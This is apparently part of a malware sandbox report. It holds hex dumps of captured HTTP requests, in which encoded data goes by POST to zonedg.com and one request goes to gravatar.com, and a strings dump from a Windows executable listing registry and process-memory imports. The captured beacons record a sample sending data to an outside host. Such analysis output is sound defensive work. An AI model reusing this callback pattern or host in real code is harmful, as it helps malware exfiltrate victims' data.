0x000000f0 (00240)   4167656e 743a206d 6f7a696c 6c612f32   Agent: mozilla/2
0x00000100 (00256)   2e300d0a 436f6e74 656e742d 4c656e67   .0..Content-Leng
0x00000110 (00272)   74683a20 300d0a43 6f6e6e65 6374696f   th: 0..Connectio
0x00000120 (00288)   6e3a2063 6c6f7365 0d0a0d0a 64793e0a   n: close....dy>.
0x00000130 (00304)   3c2f6874 6d6c3e0a 6a41416d 7a44626d   </html>.jAAmzDbm
0x00000140 (00320)   36543851 62574353 59576572 466e6c74   6T8QbWCSYWerFnlt
0x00000150 (00336)   384a6a42 54507a72 4c424e50 4b416531   8JjBTPzrLBNPKAe1
0x00000160 (00352)   4c6f654a 5637656d 70376755 4158734f   LoeJV7emp7gUAXsO
0x00000170 (00368)   314b674a 25324242 497a6738 75346a32   1KgJ%2BBIzg8u4j2
0x00000180 (00384)   304c4549 20485454 502f312e 300d0a43   0LEI HTTP/1.0..C
0x00000190 (00400)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x000001a0 (00416)   0d0a486f 73743a20 67726176 61746172   ..Host: gravatar
0x000001b0 (00432)   2e636f6d 0d0a4163 63657074 3a202a2f   .com..Accept: */
0x000001c0 (00448)   2a0d0a55 7365722d 4167656e 743a206d   *..User-Agent: m
0x000001d0 (00464)   6f7a696c 6c612f32 2e300d0a 0d0a       ozilla/2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   316c5825 32425039 68253242 49307344   1lX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683873 47253242 636f4a75   OhLgjh8sG%2BcoJu
0x000000c0 (00192)   58253242 534e776c 4b763937 35586c6d   X%2BSNwlKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6564 672e636f 6d0d0a55   t: zonedg.com..U
0x000000f0 (00240)   7365722d 4167656e 743a206d 6f7a696c   ser-Agent: mozil
0x00000100 (00256)   6c612f32 2e300d0a 436f6e74 656e742d   la/2.0..Content-
0x00000110 (00272)   4c656e67 74683a20 300d0a43 6f6e6e65   Length: 0..Conne
0x00000120 (00288)   6374696f 6e3a2063 6c6f7365 0d0a0d0a   ction: close....
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   316c5825 32425039 68253242 49307344   1lX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 46383225 3242636f   OhLgjh%2F82%2Bco
0x000000c0 (00192)   4a745825 3242534e 78723579 676d3143   JtX%2BSNxr5ygm1C
0x000000d0 (00208)   346c4b76 39373558 6c6d3547 20485454   4lKv975Xlm5G HTT
0x000000e0 (00224)   502f312e 310d0a48 6f73743a 207a6f6e   P/1.1..Host: zon
0x000000f0 (00240)   6564672e 636f6d0d 0a557365 722d4167   edg.com..User-Ag
0x00000100 (00256)   656e743a 206d6f7a 696c6c61 2f322e30   ent: mozilla/2.0
0x00000110 (00272)   0d0a436f 6e74656e 742d4c65 6e677468   ..Content-Length
0x00000120 (00288)   3a20300d 0a436f6e 6e656374 696f6e3a   : 0..Connection:
0x00000130 (00304)   20636c6f 73650d0a 0d0a416d 7a44626d    close....AmzDbm
0x00000140 (00320)   36543851 62574353 59576572 466e6c74   6T8QbWCSYWerFnlt
0x00000150 (00336)   384a6a42 54507a72 4c424e50 4b416531   8JjBTPzrLBNPKAe1
0x00000160 (00352)   4c6f654a 5637656d 70376755 4158734f   LoeJV7emp7gUAXsO
0x00000170 (00368)   314b674a 25324242 497a6738 75346a32   1KgJ%2BBIzg8u4j2
0x00000180 (00384)   304c4549 20485454 502f312e 300d0a43   0LEI HTTP/1.0..C
0x00000190 (00400)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x000001a0 (00416)   0d0a486f 73743a20 67726176 61746172   ..Host: gravatar
0x000001b0 (00432)   2e636f6d 0d0a4163 63657074 3a202a2f   .com..Accept: */
0x000001c0 (00448)   2a0d0a55 7365722d 4167656e 743a206d   *..User-Agent: m
0x000001d0 (00464)   6f7a696c 6c612f32 2e300d0a 0d0a       ozilla/2.0....


Strings
`@
.
.
.}
Zo.*..T
..
..
.
080904b0
1.0.0.1
1815
FileVersion
&find
&Find any        Alt+F
PrivateBuild
ProductVersion
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
`````````
``````````
^^^^^^^
^^^^^^^^
^^^^^^^^^^
^^^^^^^^^^^^
~~~~~~~~~~~~
<<<<<<<<
==      
>>>>>>
>>>>>>>>
>>>>>>>>>>>>>>>>>>
|||||||
________
_____________________________
----------
-------------\\
----!!,,,,,
-\\\\\\
,,,,,,
::::::::::::
!!!!!!!!!!!!!!!
??????
?........\
////////////
..""""
(((((((((
))))))))     
[[[[,,
]]]+++++++
{{{{{{
{{{{{{{
{{{{{{{{{
@@@@@@
********
******+
\\\\\\
&&&&&\\
%%%%%%!
%%%%%%%%%
%%%%%%%%%%%%%%%%%%%
+++++++++
`-{0<?
0000000000
0000lll
00OYYYYYYY
@ ?0A&
`@0Be2i
0f3iw]
;0gYn^
\0ok' `
0?Tq?:
|.@1(0(
[[[[[[[[[1111111
111111111
111111U
11111ooo
11...XXXXXXXX
1|"a%o
1Gy<4v6
=1k&@vE
1, `/mK
` 1Ox5
@1UN;T
1Y_GLf
222200
22222Y
2{5a^m
@`2b+^
2isO7X
2}R!	E
2Th$Ma
34,  2
3CC$&E
3HHHHHHH
:3&-u&F
4dddddd
4-e6nD
4G=W@.
```555
555555
`````5''''7
5c88ZZZZZZZ3#
5i';	+)Z
-5kX0K
5pppppp
5Uoy?2
6666&&
666666666666666
6666666XXX{{`
6**G.C
6PPPPP
@70\1r
777777777CCCCCCCCCC
.7%C.y
7^nw)L`H
7qG>mF
___888
888888
8g".nq
``^8Il[
}8L!`8
8(@@lgP
+8}N#+a
#8>qlG>SF
+8SSSSSSSS
99______
:9999999
&9=aAC
9J/8Ouv8
a8$ `e
aaaaaaaooo
AAAAAAAYYYYYYYY
aaa   TTTT
$$$aaax]]]]]X
(abbbzzzz
AbCxMN
acO~,E
+acV.@
ADVAPI32.dll
@_AH:mk
	AqNt,
A=<Vf*
{b3zBc
BBBBBB
bbbbbbbb
bbbbbbbbbbbbbbbbbbb
BBBBBJJ||||||
bbbbbLLLLLLLLL
BSSpDU
B(@ ?Y
:B( @Z
c3DN>;+;
,,,,,,,CC
cccccc
CCCCCC
cccccccc
CCCCCCCC
%%ccccccccccccc3
& `chF
c'JtbdE
CPh[AaiE]
CreateProcessA
CwbWyw
\&CX:Gv9z8
@`@#D0
d1B'-W
*d5O*F
DA( ki
DA|?M$
 Da>\P
@.data
!=~dcb
_Dc>tGI
DDD))))
ddd444
DDDDD~~~~
DDDDD<<<<
ddddddd
dddddddddB
ddddiiii
dKb<Zo
&@ DMZ
=D	S]G
DuZNUr
dV;bt>K
Dx5wQb
e14, `
eAV6A@/3'^T8
eeeeeee
eeekkCCCCCC
EnumResourceNamesA
Eo~Q4R
EPPPPPP
ESyH4h
E#tf,@
e-TT0cg
>E_:'u
@=}Eun
[f4FQ6
f4i>A![
FDDDDD
FD	EpD
\FD>zJf.S
f,` $``E`
F%{%\f
ff>>>Brrrr
@@@ffff
FFFF"""
fffffff
"fffffff
FFFFFFF
FFFFFFFFFFF
FFFFFFFFFFFFF
fffRRR
fN6I"O
fr[oV}
Ft6dyh<
f|TAs<~9
FUt|inA
?? fV_Y
FXds9{4
G~`{:_
~\&g2h
g;;;;;44
g5]D:;
G5R0n[/3y
g5$zg<!
GetSystemTimeAsFileTime
G]F'iTC
GGGGGG
ggggggggggggg
ggllll
g @ HC
gO?v^r
<>;=/H
hh++++
HH<<<<<<<<
h&` hD
HHHHHHHHHHHHH7pp
hhhhhhhxx
hhhlTTTTT
HHHVVVV'''
h}j??<
=hL$  D
?&` HPlW
{H~\[V
^^^^^I..
I@5g)n
`I/bZ.
if)  @
ihL|%1f
]]]]]]]II
IIIgg#
iiiiii
!!iiiiiii
IIIIIII
IIIIIIIIII
IIIIIIIIIIIIII
IIIIIIIIIIIIIIIIII
ij	/[q
i(@@+K	
IKkw6`k
InterlockedExchange
iw9X7s
j')[6*  
@-Jg"`
,,,,,'''jjjj
JJJJYYYYYYYY
<<<<<<JJJyy
	,,,,,,,jkkk
jlH62'
!jnb79
&  jnd
jO?dnM
(@ #jQ
`jUg{)
k0e-;/
K5+YRb/
?k8Qbm
 @kc!I^
K#CL5g
kE,`@;
KERNEL32.dll
@_kF0{j~
kf39t>
k?fA` .K
K\ f-!G<5-
:kgALD
KK\\\\\\\
kkkkkkl
KKKKTTT
kkkkvvvvv99
Kq{I1e
;KxS&E
k%=y%/f
@}L1lL
lF^Df$
lFdmh N
"Lg#DV
*` l+iZ
l,J9p7
LLLLLLLLLL
L=#mY?|
Ln\}d	
LocalAlloc
 l,@ RS
lSeQx`
lstrlenA
$/m=}$
"[:M*_
M4y?v3E
MBG,@ 
mg)uZP
  mhBb
mh.dll
MkQrz7
MMMdddddd^^^
)MMMiiiiii
MMMMCC
mmmmmm
MMMMMM
					MMMMMMMkk
MMMMMMMMMMMMM
mmmmmmmmmmmmmmmwXXXXX
mmmmmmmYYYYYY
mN+BY2,
mttt000000
MultiByteToWideChar
n2hm*Mi
N7,@ B
N8]$``
 `NB1s
NBqbWT
NdrFixedArrayFree
new/g0&
n~/f]]
|%NfWH
nhFbea
NHHHHffff
	Nj?I=
NJ':lE
NK\edx
~~~~~nn
NNN:::::
NNNNN====
NNNNNNNNNNN
NTBJ6g
nye&;*
 `#NYj
o1[H?}+
/+o2pe
OAAAAAA
`OAx)v
oCR(gZ
OFc/g2
OI,T(G
O<^_j,
_+`\OnLG
OO77777
oo99988888888888888888
oohhhhhhhhhhhhhhhhhhh
##oonnnn
ooo99999
oooooo
OOOOOO
OOOOOOf
ooooooo
{{oooooooooo
OpenSemaphoreW
o=rkg}
 p//2jT
p*5	a<
`p^8L	3
PathFileExistsW
p:k<n`
p@?o)j
pp33333333OOOOOOOO@@@@@@@
pp:WWW
PPy777c>
	 @ PR(
pW>J&`
,}px}T
pY[Vgq
`q	|  
Q>>>>>>
?Q^5BF
@Q5'}@J
{Q63CEd
<'q'(``M
qq<<<<<<
QQ}}}}
QQQQ66
QQQQQQ
""qqqqqqq
QQQQQQQ
QQQQQQQQPPPPP
QQQQQQQQQ8AAAAAAA
qQQQQQQQQQQQQQ
QsRvkw9
q+WTG5
Q>Z8eg6
 ;].` \r@
RaiseException
@rcCrl
RDo}h/
RegCloseKey
RegCreateKeyExA
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyA
RegOpenKeyExA
RegQueryValueExA
RegSetValueExA
.reloc
Rf\tRnP
* @.  Ri
rizx7m
?R_|L}
R^^lAP
RPCRT4.dll
Rq,@ <
RRRRRRRppppp
rrrrrrrr
))RRRRRRRRRJss
###rrrrrrrrrr
RRRRRRRRRRRRRR
RTp?dW
RVXaY4
=+s.2zl
`@+s9s
/scue1N
@`sD<D
sF>nSfJ
SHELL32.dll
SHGetMalloc
SHGetPathFromIDListA
SHGetSpecialFolderLocation
SHLWAPI.dll
Si^xKU
Sj%cVb
Smw|hA
sMz@wF#
SNihQ]
sR#ddh
SS,,,,,,,,8
sssssss!!!!!!!!!!!![
sssssssss
ssssssssss"""">>>
ssssswnnnnnnn;
|+|#}T
@t5&``
TB)~L4
!This program cannot be run in DOS mode.
~$<,tO*
~T"p-O#
T@rWh+%
tSKo]U>
` :T=T
TTaaaaa
/'TtQ#
TTTTTKmm
TTTTTTTTTTTTT
tvvvvvvvvv
T?Wu:9
` ty(`
  &``u
......U
UaovZr
Ue#{3N
uHG*9f
uk!y3~
u!!MMMMMMMMMMMMMMMMMMMMM
{uq"@ 
uu(//$$$$$$
UuidCreate
,uuuuu
uuuuuuuuuuu
"uzq?JX
UZZZZZZZZZZZZZZZ
VbLgVT
v EVh^
)|VHOgZ
VirtualAllocEx
VkX*Z"z
voIi@!
@\Vwh8V{
WaAZ-D?
wbbOF.
@WC|f`
WDrx{+
{W^?FP;
WI`^#\
WideCharToMultiByte
wNdMO.`@^
``wryZ
```````WW
WWWW,,,,,,,,,,,,,,,,1111
WWWWWWWWWWWWWWW
+x4x0y
x6kmumA
X8,`D_b
x9vtPCR
 $XarL
!xezdMz#
XfVqr+
X#hE<-
X`hhEX
xOYP%ge
XPPPPP
*@@X$`@U%
'!xX:rR
(((((((((XXX
											XXX
xxxPPP
@@xxxx
XXXXXXT
xxxxxxx$$$
XXXXXXXX
))))xxxxxxxxxxx
"@@y<:
@#\y+'
Y21btC
[Ya{	ne
YC$ @Fo
yI^xUw
-yL(ZhFWm*
$@ YN,`@
YnAr*@
Y?p*>u
;-YSJ]
*yw;.KN`D
YYOOOOOU
yyyyyyy)))))
yyyyyyyy
YYYYYYYY
@z(` $
Z29#v&
 zEBm1F
z-JEkU
ZlWm&=
Z;VvJM
ZZvvvvvvvvvvvvvv
ZZZ0000;;;;aaaaaaa
zzzHHH
ZZZZLAA
zzzz##T
=====zzzzzzrrrrrrrrr
zzzzzzzzz